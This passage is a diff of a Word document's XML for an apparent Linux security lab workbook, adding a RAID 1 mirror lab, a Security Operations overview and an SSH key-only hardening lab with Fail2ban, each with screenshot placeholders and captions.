+        <w:t>docker run -d --name capped --memory 128m --cpus 0.5 nginx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The hardened container runs as UID 1000 with no capabilities on a read-only root, and Trivy lists the image CVEs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="23" name="Picture 23"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-38.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 38 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-38-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 39 — Storage Resilience with Software RAID (mdadm)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Build redundant storage and survive a disk failure.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: The learner builds a RAID 1 mirror from loop devices, writes data, fails a disk, and confirms the data survives — the resilience leg of the CIA triad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>A RAID 1 array that keeps serving data after one member is failed and removed.   (Tools: mdadm, losetup, mkfs.ext4.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Step-by-step</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Install mdadm and create two virtual disks</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5006,7 +7456,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>MaxAuthTries 3</w:t>
+        <w:t>apt install -y mdadm &amp;&amp; for d in 1 2; do dd if=/dev/zero of=/disk$d.img bs=1M count=200; done</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Attach them as loop devices</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5016,7 +7474,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>EOF</w:t>
+        <w:t>lo1=$(losetup -f --show /disk1.img); lo2=$(losetup -f --show /disk2.img)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Create a RAID 1 mirror</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5026,7 +7492,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>systemctl restart ssh</w:t>
+        <w:t>mdadm --create /dev/md0 --level=1 --raid-devices=2 $lo1 $lo2</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5034,7 +7500,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Configure an sshd jail</w:t>
+        <w:t>Format and write a file</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5044,7 +7510,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>cat &gt; /etc/fail2ban/jail.d/sshd.local &lt;&lt;'EOF'</w:t>
+        <w:t>mkfs.ext4 /dev/md0 &amp;&amp; mkdir -p /mnt/r &amp;&amp; mount /dev/md0 /mnt/r &amp;&amp; echo IMPORTANT &gt; /mnt/r/data.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Fail and remove one disk</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5054,7 +7528,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>[sshd]</w:t>
+        <w:t>mdadm /dev/md0 --fail $lo1 --remove $lo1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Confirm data survives on the degraded array</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5064,7 +7546,196 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>enabled = true</w:t>
+        <w:t>cat /mnt/r/data.txt &amp;&amp; mdadm --detail /dev/md0 | grep State</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Test it</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The array reports a degraded state after the disk failure yet still returns the original file contents.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="24" name="Picture 24"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-39.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 39 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Full step-by-step commands and references are in labs/lab-39-*.md. Reset the Killercoda playground before the next stateful lab.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Domain 04 — Security Operations  (28%)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Hardening · IAM · MFA · SIEM · IDS · EDR · FIM · Packet analysis · Vuln mgmt · IR · Forensics · SOAR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Key concepts</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Operational security hardens access (SSH, PAM, sudo, MFA) and monitors continuously (SIEM, IDS, EDR, file-integrity monitoring, packet analysis).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>A SIEM centralises and correlates logs; an IDS inspects network traffic; EDR and osquery interrogate endpoints; AIDE detects file tampering.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerability management is a continuous pipeline: discover, prioritise (CVSS), remediate and verify — with Trivy, OpenVAS and friends.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Incident response follows preparation → detection → containment → eradication → recovery → lessons learned, with digital forensics preserving evidence and SOAR automating the playbook.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lab 21 — SSH Hardening + Fail2ban</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Exam objective: Harden SSH to key-only auth and auto-ban brute-force IPs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Goal: Switch SSH to key-based authentication and let Fail2ban ban repeated failed logins.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>What you'll build</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Key-only SSH server with an active brute-force jail.   (Tools: openssh-server, fail2ban, ssh-keygen, iptables.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="1F6FEB"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Step-by-step</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Install Fail2ban</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5074,7 +7745,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>backend = systemd</w:t>
+        <w:t>apt update &amp;&amp; apt install -y fail2ban</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Generate an ed25519 key pair</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5084,7 +7763,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>maxretry = 3</w:t>
+        <w:t>ssh-keygen -t ed25519 -f ~/.ssh/lab_ed25519 -N "" -C "lab-key"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Authorize the public key</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5094,7 +7781,15 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>bantime = 1h</w:t>
+        <w:t>cat ~/.ssh/lab_ed25519.pub &gt;&gt; ~/.ssh/authorized_keys</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Harden sshd (key-only, no root password)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5104,7 +7799,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>EOF</w:t>
+        <w:t>cat &gt; /etc/ssh/sshd_config.d/99-hardening.conf &lt;&lt;'EOF'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5114,15 +7809,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>systemctl restart fail2ban</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Trigger a ban with failed logins</w:t>
+        <w:t>PermitRootLogin prohibit-password</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5132,15 +7819,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>for i in 1 2 3 4 5; do ssh -o PubkeyAuthentication=no -o StrictHostKeyChecking=no baduser@127.0.0.1 2&gt;/dev/null; done</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Check the ban status</w:t>
+        <w:t>PasswordAuthentication no</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5150,15 +7829,7 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
-        <w:t>fail2ban-client status sshd</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Unban as admin override</w:t>
+        <w:t>MaxAuthTries 3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5168,6 +7839,158 @@
           <w:color w:val="0B3060"/>
           <w:sz w:val="19"/>
         </w:rPr>
+        <w:t>EOF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>systemctl restart ssh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Configure an sshd jail</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>cat &gt; /etc/fail2ban/jail.d/sshd.local &lt;&lt;'EOF'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>[sshd]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>enabled = true</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>backend = systemd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>maxretry = 3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>bantime = 1h</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>EOF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>systemctl restart fail2ban</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Trigger a ban with failed logins</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>for i in 1 2 3 4 5; do ssh -o PubkeyAuthentication=no -o StrictHostKeyChecking=no baduser@127.0.0.1 2&gt;/dev/null; done</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Check the ban status</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
+        <w:t>fail2ban-client status sshd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Unban as admin override</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="0B3060"/>
+          <w:sz w:val="19"/>
+        </w:rPr>
         <w:t>fail2ban-client set sshd unbanip 127.0.0.1</w:t>
       </w:r>
     </w:p>
@@ -5187,6 +8010,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="25" name="Picture 25"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-21.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 21 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5417,6 +8292,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="26" name="Picture 26"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-22.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId34"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 22 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5607,6 +8534,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="27" name="Picture 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-23.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 23 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -5815,6 +8794,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="28" name="Picture 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-24.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 24 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6035,6 +9066,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="29" name="Picture 29"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-25.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5120640" cy="2734887"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect"/>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555B66"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Lab 25 — expected terminal output on the Killercoda playground</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6265,6 +9348,58 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+            <wp:extent cx="5120640" cy="2734887"/>
+            <wp:docPr id="30" name="Picture 30"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="lab-26.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
